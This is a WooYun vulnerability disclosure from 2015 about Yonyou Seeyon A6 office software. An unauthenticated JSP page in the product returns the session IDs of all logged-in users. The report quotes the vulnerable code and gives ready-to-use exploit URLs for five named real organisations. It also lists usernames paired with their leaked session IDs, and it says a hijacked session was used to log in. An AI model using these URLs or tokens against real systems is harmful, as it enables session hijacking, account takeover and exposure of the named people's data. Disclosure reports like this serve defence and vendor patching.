当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102452

漏洞标题:用友致远A6协同管理高危漏洞二

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-03-20 16:30

修复时间:2015-06-23 16:32

公开时间:2015-06-23 16:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-20: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开

简要描述:

用友致远A6协同管理高危漏洞二

详细说明:

该漏洞泄露了当前登录用户(所有登录的)的SessionID;
利用泄露的SessionID即可登录该用户,包括管理员,进入后getshell毫无压力
/yyoa/ext/https/getSessionList.jsp
部分代码

<%@ page contentType="text/html;charset=GBK"%>
<%@ page session= "false" %>
<%@ page import="net.btdz.oa.ext.https.*"%>
<%
String reqType = request.getParameter("cmd");
String outXML = "";
boolean allowHttps = true;
if("allowHttps".equalsIgnoreCase(reqType)){
//add code to judge whether it allow https or not
allowHttps = FetchSessionList.checkHttps();
if (allowHttps) response.setHeader("AllowHttps","1");
}
if("getAll".equalsIgnoreCase(reqType)){
outXML = FetchSessionList.getXMLAll();
}
else if("getSingle".equalsIgnoreCase(reqType)){
String sessionId = request.getParameter("ssid");
if(sessionId != null){
outXML = FetchSessionList.getXMLBySessionId(sessionId);
}
}
else{
outXML += "<?xml version=\"1.0\" encoding=\"GB2312\"?>\r\n";
outXML += "<SessionList>\r\n";
// outXML += "<Session>\r\n";
// outXML += "</Session>\r\n";
outXML += "</SessionList>\r\n";
}
out.println(outXML);
%>


从上面的代码可知,当cmd参数为getAll时,便可获取到所有用户的SessionID
例如:
http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll

weiph 9EA4F8832FA1C9BA99E3D13E2F01CAF7
zhaozy F9244E7F1B8C39BB8919FAE8E19ED16A


http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll

huangsc 0088D0C9F166AD9E5C4907908B97CF2B
jiangyl 1057A63B52E4D78CA92B989149D1AC37
lisy 1586E35E947B4EF4C92AD27B8D1C279B
zhongjh 1AE537BD94C0286CE5FFE0509B4AB6D0
//...


http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll

yanyongrong 372BE72272E0C6ABB3A5815AACAD5AB8
wujianbo 5D33C475E451E080C074DD741F46470B
wangluolijin 64CCB1F31B206ADA1716A8A0252137EA
tianqinghua 78C93A5F4CEA64E34B654E8FEE470A1E
lidalong 84037EF6F41432DE9EE907C94F7B091B
liujianjun 98745C840A8BE288D91C50BB8D1F6A54


案例:
http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://110.167.194.10:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll

漏洞证明:

利用获取到的sessionid,成功登录用户。

aa.jpg

修复方案:

不知道这个文件拿来干嘛的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-23 16:32

厂商回复:

最新状态:

暂无